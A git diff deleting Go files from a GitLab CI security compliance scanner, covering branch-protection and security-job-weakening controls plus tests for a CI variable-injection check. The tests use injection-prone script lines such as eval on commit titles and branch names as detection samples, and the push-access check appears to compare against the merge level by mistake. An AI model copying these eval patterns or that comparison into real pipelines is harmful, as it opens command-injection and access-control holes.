- t.Fatalf("expected scriptBlock 'before_script', got %s", result.Issues[0].ScriptBlock)
- }
-}
-
-func TestVariableInjection_DetectsInAfterScript(t *testing.T) {
- conf := &GitlabPipelineVariableInjectionConf{
- Enabled: true,
- DangerousVariables: []string{"CI_COMMIT_TITLE"},
- }
-
- jobContent := map[interface{}]interface{}{
- "script": "echo hello",
- "after_script": []interface{}{`eval "notify $CI_COMMIT_TITLE"`},
- }
- data := buildPipelineOriginDataWithJobs(map[string]interface{}{"notify": jobContent})
- result := conf.Run(data)
-
- if len(result.Issues) != 1 {
- t.Fatalf("expected 1 issue, got %d", len(result.Issues))
- }
- if result.Issues[0].ScriptBlock != "after_script" {
- t.Fatalf("expected scriptBlock 'after_script', got %s", result.Issues[0].ScriptBlock)
- }
-}
-
-func TestVariableInjection_GlobalBeforeScript(t *testing.T) {
- conf := &GitlabPipelineVariableInjectionConf{
- Enabled: true,
- DangerousVariables: []string{"CI_COMMIT_BRANCH"},
- }
-
- mergedConf := &gitlab.GitlabCIConf{
- BeforeScript: []interface{}{
- `eval "setup $CI_COMMIT_BRANCH"`,
- },
- GitlabJobs: map[string]interface{}{},
- }
- data := &collector.GitlabPipelineOriginData{
- MergedConf: mergedConf,
- CiValid: true,
- CiMissing: false,
- }
- result := conf.Run(data)
-
- if len(result.Issues) != 1 {
- t.Fatalf("expected 1 issue from global before_script, got %d", len(result.Issues))
- }
- if result.Issues[0].JobName != "(global)" {
- t.Fatalf("expected job '(global)', got %s", result.Issues[0].JobName)
- }
-}
-
-func TestVariableInjection_AllowedPattern(t *testing.T) {
- conf := &GitlabPipelineVariableInjectionConf{
- Enabled: true,
- DangerousVariables: []string{"CI_COMMIT_REF_NAME"},
- AllowedPatterns: []string{`deploy\.sh`},
- }
-
- jobContent := map[interface{}]interface{}{
- "script": []interface{}{
- `sh -c "deploy.sh $CI_COMMIT_REF_NAME"`,
- `sh -c "echo $CI_COMMIT_REF_NAME"`,
- },
- }
- data := buildPipelineOriginDataWithJobs(map[string]interface{}{"build": jobContent})
- result := conf.Run(data)
-
- if len(result.Issues) != 1 {
- t.Fatalf("expected 1 issue (second line only), got %d", len(result.Issues))
- }
-}
-
-func TestVariableInjection_CleanConfig(t *testing.T) {
- conf := &GitlabPipelineVariableInjectionConf{
- Enabled: true,
- DangerousVariables: []string{"CI_COMMIT_MESSAGE", "CI_MERGE_REQUEST_TITLE"},
- }
-
- jobContent := map[interface{}]interface{}{
- "script": []interface{}{
- "echo $CI_COMMIT_MESSAGE",
- "make build",
- `printf '%s' "$CI_MERGE_REQUEST_TITLE"`,
- },
- }
- data := buildPipelineOriginDataWithJobs(map[string]interface{}{"build": jobContent})
- result := conf.Run(data)
-
- if result.Compliance != 100.0 {
- t.Fatalf("expected compliance 100, got %v", result.Compliance)
- }
- if len(result.Issues) != 0 {
- t.Fatalf("expected no issues for safe usage, got %d", len(result.Issues))
- }
-}
-
-func TestVariableInjection_MixedSafeAndDangerous(t *testing.T) {
- conf := &GitlabPipelineVariableInjectionConf{
- Enabled: true,
- DangerousVariables: []string{"CI_COMMIT_BRANCH"},
- }
-
- jobContent := map[interface{}]interface{}{
- "script": []interface{}{
- "echo $CI_COMMIT_BRANCH",
- `git checkout "$CI_COMMIT_BRANCH"`,
- `eval "deploy $CI_COMMIT_BRANCH"`,
- },
- }
- data := buildPipelineOriginDataWithJobs(map[string]interface{}{"build": jobContent})
- result := conf.Run(data)
-
- if len(result.Issues) != 1 {
- t.Fatalf("expected 1 issue (only the eval line), got %d", len(result.Issues))
- }
- if result.Issues[0].ScriptLine != `eval "deploy $CI_COMMIT_BRANCH"` {
- t.Fatalf("expected eval line flagged, got %s", result.Issues[0].ScriptLine)
- }
-}
diff --git a/control/controlGitlabProtectionBranchProtectionNotCompliant.go b/control/controlGitlabProtectionBranchProtectionNotCompliant.go
deleted file mode 100644
index 9fb6464..0000000
--- a/control/controlGitlabProtectionBranchProtectionNotCompliant.go
+++ /dev/null
@@ -1,428 +0,0 @@
-package control
-
-import (
- wildcard "github.com/IGLOU-EU/go-wildcard/v2"
- "github.com/getplumber/plumber/collector"
- "github.com/getplumber/plumber/configuration"
- "github.com/getplumber/plumber/gitlab"
- "github.com/sirupsen/logrus"
-)
-
-const ControlTypeGitlabProtectionBranchProtectionNotCompliantVersion = "0.2.0"
-
-//////////////////////////
-// Control configuration //
-//////////////////////////
-
-// GitlabBranchProtectionControl handles branch protection compliance checking
-type GitlabBranchProtectionControl struct {
- config *configuration.BranchProtectionControlConfig
-}
-
-// NewGitlabBranchProtectionControl creates a new branch protection control instance
-func NewGitlabBranchProtectionControl(config *configuration.BranchProtectionControlConfig) *GitlabBranchProtectionControl {
- return &GitlabBranchProtectionControl{
- config: config,
- }
-}
-
-// BranchProtectionCompliance holds information about a branch's protection compliance
-type BranchProtectionCompliance struct {
- BranchName string
- Default bool
- Protected bool
- AllowForcePush bool
- CodeOwnerApprovalRequired bool
- MinPushAccessLevel int
- MinMergeAccessLevel int
- ProtectionPattern string
- PushAccessLevels []gitlab.BranchProtectionAccessLevel
- MergeAccessLevels []gitlab.BranchProtectionAccessLevel
-}
-
-// GitlabBranchProtectionResult holds the result of the branch protection control
-type GitlabBranchProtectionResult struct {
- Enabled bool `json:"enabled"`
- Skipped bool `json:"skipped,omitempty"`
- Compliance float64 `json:"compliance"`
- Version string `json:"version"`
- Data []BranchProtectionData `json:"data,omitempty"`
- Metrics *BranchProtectionMetrics `json:"metrics,omitempty"`
- Issues []BranchProtectionIssue `json:"issues,omitempty"`
- Error string `json:"error,omitempty"`
-}
-
-// BranchProtectionData holds information about a branch's protection status
-type BranchProtectionData struct {
- BranchName string `json:"branchName"`
- Default bool `json:"default"`
- Protected bool `json:"protected"`
- AllowForcePush bool `json:"allowForcePush,omitempty"`
- CodeOwnerApprovalRequired bool `json:"codeOwnerApprovalRequired,omitempty"`
- MinMergeAccessLevel int `json:"minMergeAccessLevel,omitempty"`
- MinPushAccessLevel int `json:"minPushAccessLevel,omitempty"`
- AuthorizedMinMergeAccessLevel int `json:"authorizedMinMergeAccessLevel,omitempty"`
- AuthorizedMinPushAccessLevel int `json:"authorizedMinPushAccessLevel,omitempty"`
-}
-
-// BranchProtectionMetrics holds metrics for the branch protection control
-type BranchProtectionMetrics struct {
- Branches int `json:"branches"`
- BranchesToProtect int `json:"branchesToProtect"`
- UnprotectedBranches int `json:"unprotectedBranches"`
- NonCompliantBranches int `json:"nonCompliantBranches"`
- TotalProtectedBranches int `json:"totalProtectedBranches"`
- ProjectsCorrectlyProtected int `json:"projectsCorrectlyProtected"`
-}
-
-// BranchProtectionIssue represents an issue found by the branch protection control
-type BranchProtectionIssue struct {
- Code ErrorCode `json:"code"`
- DocURL string `json:"docUrl"`
- Type string `json:"type"` // "unprotected" or "non_compliant"
- BranchName string `json:"branchName"`
- AllowForcePush bool `json:"allowForcePush,omitempty"`
- AllowForcePushDisplay bool `json:"allowForcePushDisplay,omitempty"`
- CodeOwnerApprovalRequired bool `json:"codeOwnerApprovalRequired,omitempty"`
- CodeOwnerApprovalRequiredDisplay bool `json:"codeOwnerApprovalRequiredDisplay,omitempty"`
- MinMergeAccessLevel int `json:"minMergeAccessLevel,omitempty"`
- MinMergeAccessLevelDisplay bool `json:"minMergeAccessLevelDisplay,omitempty"`
- AuthorizedMinMergeAccessLevel int `json:"authorizedMinMergeAccessLevel,omitempty"`
- MinPushAccessLevel int `json:"minPushAccessLevel,omitempty"`
- MinPushAccessLevelDisplay bool `json:"minPushAccessLevelDisplay,omitempty"`
- AuthorizedMinPushAccessLevel int `json:"authorizedMinPushAccessLevel,omitempty"`
-}
-
-///////////////////
-// Control run //
-///////////////////
-
-// Run executes the branch protection compliance check
-func (c *GitlabBranchProtectionControl) Run(
- protectionData *collector.GitlabProtectionAnalysisData,
- project *gitlab.ProjectInfo,
-) *GitlabBranchProtectionResult {
-
- // Set logging
- logger := l.WithFields(logrus.Fields{
- "control": "GitlabBranchProtectionNotCompliant",
- "project": project.Path,
- "projectId": project.ID,
- })
-
- // Check if control is enabled
- if c.config == nil || !c.config.IsEnabled() {
- logger.Info("Branch protection control is disabled or not configured")
- return &GitlabBranchProtectionResult{
- Enabled: false,
- Skipped: true,
- Compliance: 100.0,
- Version: ControlTypeGitlabProtectionBranchProtectionNotCompliantVersion,
- }
- }
-
- // Log the control start
- logger.Info("Start branch protection control")
-
- data := []BranchProtectionData{}
- issues := []BranchProtectionIssue{}
- metrics := &BranchProtectionMetrics{}
- compliance := 0.0
-
- // Check which branches should be protected based on configuration
- branchesToProtect := map[string]*BranchProtectionCompliance{}
- if len(protectionData.Branches) != 0 {
- branchesToProtect = c.checkBranches(
- protectionData.Branches,
- protectionData.BranchProtections,
- project.DefaultBranch,
- )
- }
-
- nonCompliantCount := 0
- unprotectedCount := 0
- totalProtectedBranches := 0
-
- // Get config values with defaults
- allowForcePush := false
- if c.config.AllowForcePush != nil {
- allowForcePush = *c.config.AllowForcePush
- }
-
- codeOwnerApprovalRequired := false
- if c.config.CodeOwnerApprovalRequired != nil {
- codeOwnerApprovalRequired = *c.config.CodeOwnerApprovalRequired
- }
-
- minMergeAccessLevel := 0
- if c.config.MinMergeAccessLevel != nil {
- minMergeAccessLevel = *c.config.MinMergeAccessLevel
- }
-
- minPushAccessLevel := 0
- if c.config.MinPushAccessLevel != nil {
- minPushAccessLevel = *c.config.MinPushAccessLevel
- }
-
- defaultMustBeProtected := false
- if c.config.DefaultMustBeProtected != nil {
- defaultMustBeProtected = *c.config.DefaultMustBeProtected
- }
-
- // Process each branch that should be protected
- for _, branch := range branchesToProtect {
- // Add branch data for all branches that should be protected
- branchData := BranchProtectionData{
- BranchName: branch.BranchName,
- Default: branch.Default,
- Protected: branch.Protected,
- }
-
- // Handle unprotected branches
- if !branch.Protected {
- unprotectedCount++
-
- // Create issue for unprotected branch
- issue := BranchProtectionIssue{
- Code: CodeBranchUnprotected,
- DocURL: CodeBranchUnprotected.DocURL(),
- Type: "unprotected",
- BranchName: branch.BranchName,
- }
- issues = append(issues, issue)
- data = append(data, branchData)
- continue
- }
-
- totalProtectedBranches++
-
- // Skip if this branch doesn't match any pattern in this configuration
- matchesPattern := false
- for _, pattern := range c.config.NamePatterns {
- if wildcard.Match(pattern, branch.BranchName) {
- matchesPattern = true
- break
- }
- }
- if !matchesPattern && (!defaultMustBeProtected || !branch.Default) {
- continue
- }
-
- // Check compliance issues
- issueData := BranchProtectionIssue{
- Code: CodeBranchNonCompliant,
- DocURL: CodeBranchNonCompliant.DocURL(),
- Type: "non_compliant",
- BranchName: branch.BranchName,
- AllowForcePush: branch.AllowForcePush,
- CodeOwnerApprovalRequired: branch.CodeOwnerApprovalRequired,
- MinMergeAccessLevel: branch.MinMergeAccessLevel,
- AuthorizedMinMergeAccessLevel: minMergeAccessLevel,
- MinPushAccessLevel: branch.MinPushAccessLevel,
- AuthorizedMinPushAccessLevel: minPushAccessLevel,
- }
-
- hasIssue := false
-
- // Check if forcePushAllowed is not respected
- if !allowForcePush && branch.AllowForcePush {
- issueData.AllowForcePushDisplay = true
- hasIssue = true
- }
-
- // Check if codeOwnerApprovalRequired is not respected
- if codeOwnerApprovalRequired && !branch.CodeOwnerApprovalRequired {
- issueData.CodeOwnerApprovalRequiredDisplay = true
- hasIssue = true
- }
-
- // Check if min access level is not respected for merge
- if branch.MinMergeAccessLevel != 0 && (minMergeAccessLevel == 0 || minMergeAccessLevel > branch.MinMergeAccessLevel) {
- issueData.MinMergeAccessLevelDisplay = true
- hasIssue = true
- }
-
- // Check if min access level is not respected for push
- if branch.MinPushAccessLevel != 0 && (minPushAccessLevel == 0 || minPushAccessLevel > branch.MinPushAccessLevel) {
- issueData.MinPushAccessLevelDisplay = true
- hasIssue = true
- }
-
- // Create issue if needed
- if hasIssue {
- nonCompliantCount++
-
- // Add data with compliance details
- branchData.AllowForcePush = issueData.AllowForcePush
- branchData.CodeOwnerApprovalRequired = issueData.CodeOwnerApprovalRequired
- branchData.MinMergeAccessLevel = issueData.MinMergeAccessLevel
- branchData.MinPushAccessLevel = issueData.MinPushAccessLevel
- branchData.AuthorizedMinMergeAccessLevel = issueData.AuthorizedMinMergeAccessLevel
- branchData.AuthorizedMinPushAccessLevel = issueData.AuthorizedMinPushAccessLevel
-
- issues = append(issues, issueData)
- }
-
- // Always add data for protected branches, even if compliant
- if hasIssue || len(data) == 0 || data[len(data)-1].BranchName != branchData.BranchName {
- data = append(data, branchData)
- }
- }
-
- // Calculate metrics
- metrics.Branches = len(protectionData.Branches)
- metrics.BranchesToProtect = len(branchesToProtect)
- metrics.UnprotectedBranches = unprotectedCount
- metrics.NonCompliantBranches = nonCompliantCount
- metrics.TotalProtectedBranches = totalProtectedBranches
- if unprotectedCount == 0 && nonCompliantCount == 0 && len(branchesToProtect) > 0 {
- metrics.ProjectsCorrectlyProtected = 1
- }
-
- // Calculate compliance
- if len(issues) == 0 {
- compliance = 100.0
- } else {
- logger.WithField("issueCount", len(issues)).Debug("Issues found, compliance is 0")
- }
-
- return &GitlabBranchProtectionResult{
- Enabled: true,
- Compliance: compliance,
- Version: ControlTypeGitlabProtectionBranchProtectionNotCompliantVersion,
- Data: data,
- Metrics: metrics,
- Issues: issues,
- }
-}
-
-// checkBranches determines which branches need protection and their current protection status
-func (c *GitlabBranchProtectionControl) checkBranches(
- branches []string,
- branchProtections []gitlab.BranchProtection,
- defaultBranch string,
-) map[string]*BranchProtectionCompliance {
-
- // Get config values
- defaultMustBeProtected := false
- if c.config.DefaultMustBeProtected != nil {
- defaultMustBeProtected = *c.config.DefaultMustBeProtected
- }
-
- // Filter repo branches by patterns
- branchesToProtect := map[string]*BranchProtectionCompliance{}
-
- // First, collect all branches that need protection based on configuration
- if defaultMustBeProtected {
- branchesToProtect[defaultBranch] = &BranchProtectionCompliance{
- BranchName: defaultBranch,
- Default: true,
- Protected: false,
- }
- }
-
- for _, branch := range branches {
- for _, pattern := range c.config.NamePatterns {
- if wildcard.Match(pattern, branch) {
- if _, exists := branchesToProtect[branch]; !exists {
- branchesToProtect[branch] = &BranchProtectionCompliance{
- BranchName: branch,
- Default: branch == defaultBranch,
- Protected: false,
- }
- }
- }
- }
- }
-
- // Set all branches to protect with the least permissive protection
- // configuration to simplify the check in the next loop while keeping the
- // most permissive rule in case of multiple match
- for _, branch := range branchesToProtect {
- branch.AllowForcePush = false
- branch.CodeOwnerApprovalRequired = true
- branch.MinMergeAccessLevel = gitlab.AccessLevelNo
- branch.MinPushAccessLevel = gitlab.AccessLevelNo
- branch.PushAccessLevels = []gitlab.BranchProtectionAccessLevel{}
- branch.MergeAccessLevels = []gitlab.BranchProtectionAccessLevel{}
- }
-
- // For each branch to protect: loop over all protection patterns and try
- // to match following GitLab pattern matching rules:
- // - Only wildcard "*" can be used
- // - Matching is case-sensitive
-
- // NOTE: here, we use the wildcard lib matching (*, ?, .) pattern which is
- // not the same as GitLab. It can produce wrong results in case of
- // interrogation mark or dots present in protection name pattern (they are
- // not interpreted by GitLab but we interpret them)
-
- // NOTE: if a branch matches 2 protection rules, the most permissive is
- // applied (see
- // https://docs.gitlab.com/ee/user/project/repository/branches/protected.html#when-a-branch-matches-multiple-rules)
-
- for _, branch := range branchesToProtect {
- for _, branchProtection := range branchProtections {
-
- // If protection does not match with branch, continue
- if !wildcard.Match(branchProtection.ProtectionPattern, branch.BranchName) {
- continue
- }
-
- // Add protection data
- branch.Protected = true
-
- // NOTE: if several protection patterns match for the same branch,
- // this field will be overridden
- branch.ProtectionPattern = branchProtection.ProtectionPattern
-
- // Add protection rules while always keeping the most permissive
-
- // If allow force push currently set in the branch is false, it
- // means that it's not to the most permissive state, so we can
- // apply current protection
- if !branch.AllowForcePush {
- branch.AllowForcePush = branchProtection.AllowForcePush
- }
-
- // If code owner approval required currently set in the branch is
- // true, it means that it's not to the most permissive state, so we
- // can apply current protection
- if branch.CodeOwnerApprovalRequired {
- branch.CodeOwnerApprovalRequired = branchProtection.CodeOwnerApprovalRequired
- }
-
- // Merge access level
- for _, mergeAccessLevel := range branchProtection.MergeAccessLevels {
-
- // Add it to branch for data
- branch.MergeAccessLevels = append(branch.MergeAccessLevels, mergeAccessLevel)
-
- // If merge access level from the protection rule is different
- // than 0 (No one) and smaller than the minimum currently set
- // in branch, we take it as min access level as it's equal or
- // more permissive to the current min
- if branch.MinMergeAccessLevel == 0 || ((mergeAccessLevel.AccessLevel != gitlab.AccessLevelNo) && (mergeAccessLevel.AccessLevel < branch.MinMergeAccessLevel)) {
- branch.MinMergeAccessLevel = mergeAccessLevel.AccessLevel
- }
- }
-
- // Push access level
- for _, pushAccessLevel := range branchProtection.PushAccessLevels {
-
- // Add it to branch for data
- branch.PushAccessLevels = append(branch.PushAccessLevels, pushAccessLevel)
-
- // If push access level from the protection rule is different than
- // 0 (No one) and smaller than the minimum currently set in branch,
- // we apply it as min access level as it's equal or more permissive
- // to the current min
- if branch.MinPushAccessLevel == 0 || ((pushAccessLevel.AccessLevel != gitlab.AccessLevelNo) && (pushAccessLevel.AccessLevel < branch.MinMergeAccessLevel)) {
- branch.MinPushAccessLevel = pushAccessLevel.AccessLevel
- }
- }
- }
- }
-
- return branchesToProtect
-}
diff --git a/control/controlGitlabSecurityJobsWeakened.go b/control/controlGitlabSecurityJobsWeakened.go
deleted file mode 100644
index 5ef49f1..0000000
--- a/control/controlGitlabSecurityJobsWeakened.go
+++ /dev/null
@@ -1,383 +0,0 @@
-package control
-
-import (
- "fmt"
- "path/filepath"
- "strings"
-
- "github.com/getplumber/plumber/collector"
- "github.com/getplumber/plumber/configuration"
- "github.com/getplumber/plumber/gitlab"
- "github.com/sirupsen/logrus"
- "gopkg.in/yaml.v2"
-)
-
-const ControlTypeGitlabSecurityJobsWeakenedVersion = "0.1.0"
-
-//////////////////
-// Control conf //
-//////////////////
-
-// GitlabSecurityJobsWeakenedConf holds the runtime configuration for this control
-type GitlabSecurityJobsWeakenedConf struct {
- Enabled bool
- SecurityJobPatterns []string
- AllowFailureCheck bool
- RulesCheck bool
- WhenManualCheck bool
-}
-
-// GetConf loads configuration from PlumberConfig
-func (p *GitlabSecurityJobsWeakenedConf) GetConf(plumberConfig *configuration.PlumberConfig) error {
- if plumberConfig == nil {
- p.Enabled = false
- return nil
- }
-
- cfg := plumberConfig.GetSecurityJobsMustNotBeWeakenedConfig()
- if cfg == nil {
- l.Debug("securityJobsMustNotBeWeakened control configuration is missing from .plumber.yaml file, skipping")
- p.Enabled = false
- return nil
- }
-
- if cfg.Enabled == nil {
- return fmt.Errorf("securityJobsMustNotBeWeakened.enabled field is required in .plumber.yaml config file")
- }
-
- p.Enabled = cfg.IsEnabled()
- p.SecurityJobPatterns = cfg.SecurityJobPatterns
-
- // Sub-control defaults: allowFailure off, rules on, whenManual on
- p.AllowFailureCheck = cfg.AllowFailureMustBeFalse.IsEnabled(false)
- p.RulesCheck = cfg.RulesMustNotBeRedefined.IsEnabled(true)
- p.WhenManualCheck = cfg.WhenMustNotBeManual.IsEnabled(true)
-
- l.WithFields(logrus.Fields{
- "enabled": p.Enabled,
- "patterns": p.SecurityJobPatterns,
- "allowFailureCheck": p.AllowFailureCheck,
- "rulesCheck": p.RulesCheck,
- "whenManualCheck": p.WhenManualCheck,
- }).Debug("securityJobsMustNotBeWeakened control configuration loaded from .plumber.yaml file")
-
- return nil
-}
-
-////////////////////////////
-// Control data & metrics //
-////////////////////////////
-
-// GitlabSecurityJobsWeakenedMetrics holds metrics about security job weakening detection
-type GitlabSecurityJobsWeakenedMetrics struct {
- SecurityJobsFound uint `json:"securityJobsFound"`
- WeakenedJobs uint `json:"weakenedJobs"`
-}
-
-// GitlabSecurityJobsWeakenedResult holds the result of the security jobs weakened control
-type GitlabSecurityJobsWeakenedResult struct {
- Issues []GitlabSecurityJobsWeakenedIssue `json:"issues"`
- Metrics GitlabSecurityJobsWeakenedMetrics `json:"metrics"`
- Compliance float64 `json:"compliance"`
- Version string `json:"version"`
- CiValid bool `json:"ciValid"`
- CiMissing bool `json:"ciMissing"`
- Skipped bool `json:"skipped"`
- Error string `json:"error,omitempty"`
-}
-
-////////////////////
-// Control issues //
-////////////////////
-
-// GitlabSecurityJobsWeakenedIssue represents a weakened security job
-type GitlabSecurityJobsWeakenedIssue struct {
- Code ErrorCode `json:"code"`
- DocURL string `json:"docUrl"`
- JobName string `json:"jobName"`
- SubControl string `json:"subControl"` // "allowFailureMustBeFalse", "rulesMustNotBeRedefined", "whenMustNotBeManual"
- Detail string `json:"detail"`
-}
-
-///////////////////////
-// Control functions //
-///////////////////////
-
-// Run executes the security jobs weakening detection control
-func (p *GitlabSecurityJobsWeakenedConf) Run(pipelineOriginData *collector.GitlabPipelineOriginData) *GitlabSecurityJobsWeakenedResult {
- l := l.WithFields(logrus.Fields{
- "control": "GitlabSecurityJobsWeakened",
- "controlVersion": ControlTypeGitlabSecurityJobsWeakenedVersion,
- })
- l.Info("Start security jobs weakening detection control")
-
- result := &GitlabSecurityJobsWeakenedResult{
- Issues: []GitlabSecurityJobsWeakenedIssue{},
- Metrics: GitlabSecurityJobsWeakenedMetrics{},
- Compliance: 100.0,
- Version: ControlTypeGitlabSecurityJobsWeakenedVersion,
- CiValid: pipelineOriginData.CiValid,
- CiMissing: pipelineOriginData.CiMissing,
- Skipped: false,
- }
-
- if !p.Enabled {
- l.Info("Security jobs weakening detection control is disabled, skipping")
- result.Skipped = true
- return result
- }
-
- if !p.AllowFailureCheck && !p.RulesCheck && !p.WhenManualCheck {
- l.Info("All sub-controls are disabled, skipping")
- result.Skipped = true
- return result
- }
-
- if !pipelineOriginData.CiValid || pipelineOriginData.CiMissing {
- result.Compliance = 0.0
- return result
- }
-
- mergedConf := pipelineOriginData.MergedConf
- if mergedConf == nil {
- result.Compliance = 0
- result.Error = "merged CI configuration not available"
- return result
- }
-
- // Build set of security job names from two sources:
- // 1. Jobs originating from known security templates
- // 2. Jobs matching user-configured name patterns
- securityJobs := p.identifySecurityJobs(pipelineOriginData)
-
- result.Metrics.SecurityJobsFound = uint(len(securityJobs))
-
- if len(securityJobs) == 0 {
- l.Info("No security jobs found in pipeline")
- return result
- }
-
- // Track which jobs have been flagged to avoid double-counting in metrics
- weakenedSet := make(map[string]bool)
-
- // Sub-control 1: allowFailureMustBeFalse
- if p.AllowFailureCheck {
- for jobName := range securityJobs {
- jobContent, exists := mergedConf.GitlabJobs[jobName]
- if !exists {
- continue
- }
- job, err := gitlab.ParseGitlabCIJob(jobContent)
- if err != nil || job == nil {
- continue
- }
- if isAllowFailureTrue(job.AllowFailure) {
- result.Issues = append(result.Issues, GitlabSecurityJobsWeakenedIssue{
- Code: CodeSecurityJobWeakened,
- DocURL: CodeSecurityJobWeakened.DocURL(),
- JobName: jobName,
- SubControl: "allowFailureMustBeFalse",
- Detail: "allow_failure is true (should be false for blocking security)",
- })
- weakenedSet[jobName] = true
- l.WithField("job", jobName).Debug("Security job has allow_failure: true")
- }
- }
- }
-
- // Sub-control 2: rulesMustNotBeRedefined
- // Check the unmerged Conf (raw .gitlab-ci.yml) and JobHardcodedContent for rules overrides
- if p.RulesCheck {
- for jobName := range securityJobs {
- var rawContent interface{}
- found := false
-
- // First check raw .gitlab-ci.yml (unmerged Conf)
- if pipelineOriginData.Conf != nil {
- if content, exists := pipelineOriginData.Conf.GitlabJobs[jobName]; exists {
- rawContent = content
- found = true
- }
- }
-
- // Fall back to JobHardcodedContent (covers local overrides)
- if !found {
- if content, exists := pipelineOriginData.JobHardcodedContent[jobName]; exists {
- rawContent = content
- found = true
- }
- }
-
- if !found {
- continue
- }
-
- rulesOverride := extractRulesFromRawContent(rawContent)
- if rulesOverride == nil {
- continue
- }
-
- for _, rule := range rulesOverride {
- whenVal := strings.ToLower(strings.TrimSpace(rule.When))
- if whenVal == "never" {
- result.Issues = append(result.Issues, GitlabSecurityJobsWeakenedIssue{
- Code: CodeSecurityJobWeakened,
- DocURL: CodeSecurityJobWeakened.DocURL(),
- JobName: jobName,
- SubControl: "rulesMustNotBeRedefined",
- Detail: "rules overridden with 'when: never', job will not run",
- })
- weakenedSet[jobName] = true
- l.WithField("job", jobName).Debug("Security job has rules overridden with when: never")
- break
- }
- if whenVal == "manual" {
- result.Issues = append(result.Issues, GitlabSecurityJobsWeakenedIssue{
- Code: CodeSecurityJobWeakened,
- DocURL: CodeSecurityJobWeakened.DocURL(),
- JobName: jobName,
- SubControl: "rulesMustNotBeRedefined",
- Detail: "rules overridden with 'when: manual', job requires manual trigger",
- })
- weakenedSet[jobName] = true
- l.WithField("job", jobName).Debug("Security job has rules overridden with when: manual")
- break
- }
- }
- }
- }
-
- // Sub-control 3: whenMustNotBeManual
- if p.WhenManualCheck {
- for jobName := range securityJobs {
- jobContent, exists := mergedConf.GitlabJobs[jobName]
- if !exists {
- continue
- }
- job, err := gitlab.ParseGitlabCIJob(jobContent)
- if err != nil || job == nil {
- continue
- }
- if isWhenManual(job.When) {
- result.Issues = append(result.Issues, GitlabSecurityJobsWeakenedIssue{
- Code: CodeSecurityJobWeakened,
- DocURL: CodeSecurityJobWeakened.DocURL(),
- JobName: jobName,
- SubControl: "whenMustNotBeManual",
- Detail: "when set to 'manual', job requires manual trigger",
- })
- weakenedSet[jobName] = true
- l.WithField("job", jobName).Debug("Security job has when: manual")
- }
- }
- }
-
- result.Metrics.WeakenedJobs = uint(len(weakenedSet))
-
- if len(result.Issues) > 0 {
- result.Compliance = 0.0
- l.WithField("issuesCount", len(result.Issues)).Info("Weakened security jobs found, setting compliance to 0")
- }
-
- l.WithFields(logrus.Fields{
- "securityJobsFound": result.Metrics.SecurityJobsFound,
- "weakenedJobs": result.Metrics.WeakenedJobs,
- "compliance": result.Compliance,
- }).Info("Security jobs weakening detection control completed")
-
- return result
-}
-
-// identifySecurityJobs returns a set of job names that are considered security jobs.
-// A job qualifies if its name matches any of the user-configured securityJobPatterns.
-func (p *GitlabSecurityJobsWeakenedConf) identifySecurityJobs(data *collector.GitlabPipelineOriginData) map[string]bool {
- securityJobs := make(map[string]bool)
-
- if len(p.SecurityJobPatterns) == 0 || data.MergedConf == nil {
- return securityJobs
- }
-
- for jobName := range data.MergedConf.GitlabJobs {
- if matchesAnyPattern(jobName, p.SecurityJobPatterns) {
- securityJobs[jobName] = true
- }
- }
-
- return securityJobs
-}
-
-// matchesAnyPattern checks if a job name matches any of the provided glob patterns
-func matchesAnyPattern(jobName string, patterns []string) bool {
- for _, pattern := range patterns {
- matched, err := filepath.Match(pattern, jobName)
- if err == nil && matched {
- return true
- }
- }
- return false
-}
-
-// isAllowFailureTrue checks if the allow_failure field is set to true.
-// allow_failure can be a bool, a string "true", or a map with exit_codes.
-func isAllowFailureTrue(af interface{}) bool {
- if af == nil {
- return false
- }
- switch v := af.(type) {
- case bool:
- return v
- case string:
- return strings.ToLower(strings.TrimSpace(v)) == "true"
- case map[interface{}]interface{}:
- // allow_failure: {exit_codes: [1, 2]} is a partial allow, treat as true
- return true
- }
- return false
-}
-
-// isWhenManual checks if the when field is set to "manual"
-func isWhenManual(when interface{}) bool {
- if when == nil {
- return false
- }
- switch v := when.(type) {
- case string:
- return strings.ToLower(strings.TrimSpace(v)) == "manual"
- }
- return false
-}
-
-// extractRulesFromRawContent extracts the rules from a raw job content (interface{})
-// and parses them into a slice of Rule structs.
-func extractRulesFromRawContent(rawContent interface{}) []gitlab.Rule {
- contentMap, ok := rawContent.(map[interface{}]interface{})
- if !ok {
- // Try string-keyed map (from JSON or some YAML parsers)
- if strMap, ok2 := rawContent.(map[string]interface{}); ok2 {
- contentMap = make(map[interface{}]interface{}, len(strMap))
- for k, v := range strMap {
- contentMap[k] = v
- }
- } else {
- return nil
- }
- }
-
- rulesRaw, exists := contentMap["rules"]
- if !exists {
- return nil
- }
-
- // Marshal and unmarshal to get properly typed rules
- yamlData, err := yaml.Marshal(rulesRaw)
- if err != nil {
- return nil
- }
-
- var rules []gitlab.Rule
- if err := yaml.Unmarshal(yamlData, &rules); err != nil {
- return nil
- }
-
- return rules
-}
diff --git a/control/controlGitlabSecurityJobsWeakened_test.go b/control/controlGitlabSecurityJobsWeakened_test.go
deleted file mode 100644
index 6f6b779..0000000
--- a/control/controlGitlabSecurityJobsWeakened_test.go
+++ /dev/null
@@ -1,557 +0,0 @@
-package control
-
-import (
- "testing"
-
- "github.com/getplumber/plumber/collector"
- "github.com/getplumber/plumber/gitlab"
-)
-
-// helper to build pipeline origin data with merged conf and origins
-func buildSecurityJobsPipelineData(
- mergedJobs map[string]interface{},
- rawJobs map[string]interface{},
- origins []collector.GitlabPipelineOriginDataFull,
-) *collector.GitlabPipelineOriginData {
- mergedConf := &gitlab.GitlabCIConf{
- GitlabJobs: mergedJobs,
- }
- var rawConf *gitlab.GitlabCIConf
- if rawJobs != nil {
- rawConf = &gitlab.GitlabCIConf{
- GitlabJobs: rawJobs,
- }
- }
- return &collector.GitlabPipelineOriginData{
- MergedConf: mergedConf,
- Conf: rawConf,
- CiValid: true,
- CiMissing: false,
- Origins: origins,
- JobMap: make(map[string]*collector.GitlabPipelineJobData),
- JobHardcodedMap: make(map[string]bool),
- JobHardcodedContent: make(map[string]interface{}),
- }
-}
-
-func TestSecurityJobsWeakened_Disabled(t *testing.T) {
- conf := &GitlabSecurityJobsWeakenedConf{
- Enabled: false,
- }
- data := buildSecurityJobsPipelineData(nil, nil, nil)
-
- result := conf.Run(data)
-
- if !result.Skipped {
- t.Fatal("expected control to be skipped when disabled")
- }
- if result.Compliance != 100.0 {
- t.Fatalf("expected compliance 100 when skipped, got %v", result.Compliance)
- }
-}
-
-func TestSecurityJobsWeakened_AllSubControlsDisabled(t *testing.T) {
- conf := &GitlabSecurityJobsWeakenedConf{
- Enabled: true,
